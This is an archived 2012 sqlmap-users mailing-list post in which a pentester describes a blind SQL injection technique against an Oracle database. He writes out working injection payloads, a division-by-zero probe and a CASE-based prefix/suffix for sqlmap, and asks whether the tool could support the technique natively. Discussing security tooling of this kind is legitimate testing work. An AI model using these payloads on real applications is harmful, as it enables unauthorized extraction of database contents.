[sqlmap-users] Add a new Injection-Type to sqlmap?
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Add a new Injection-Type to sqlmap?
|
From: whp <wh...@po...> - 2012-07-26 09:27:00
|
Hi list/developer I stumbled over this type of injection while doing a pentest and thought of implementing this kind of injection in sqlmap (I call is "error-based-blind-injection"): The Webapp replied with "success", if the statement was correct, regardless of the number of returned rows (the rows actually were fetched in a subsequent request). And with an empty respons, if the statement failed. So the attack was identified the following way (It is a Oracle DB): param=' and to_char(1/0) like '1 --> empty response because 1/0 is a devision by zero error param=' and to_char(1/1) like '1 --> success Now I had to find a workaround to get sqlmap to identify this injection (it only identified a time based blind, but I wanted a _fast_ attack) My solution: prefix= ' and to_char(1/(case (select 'a' from dual where 1=1 suffix= ) when 'a' then '1' else '0' end)) like '1 Know my question: is it possible to get this attack in sqlmap as a standard attack - or is there an easier way to configure sqlmap? Additionaly the oracle -"order by" clause injection via a case-statement would be interesting. Your opinions/suggestions? Chris -- whp_at_pohlcity_dot_de |
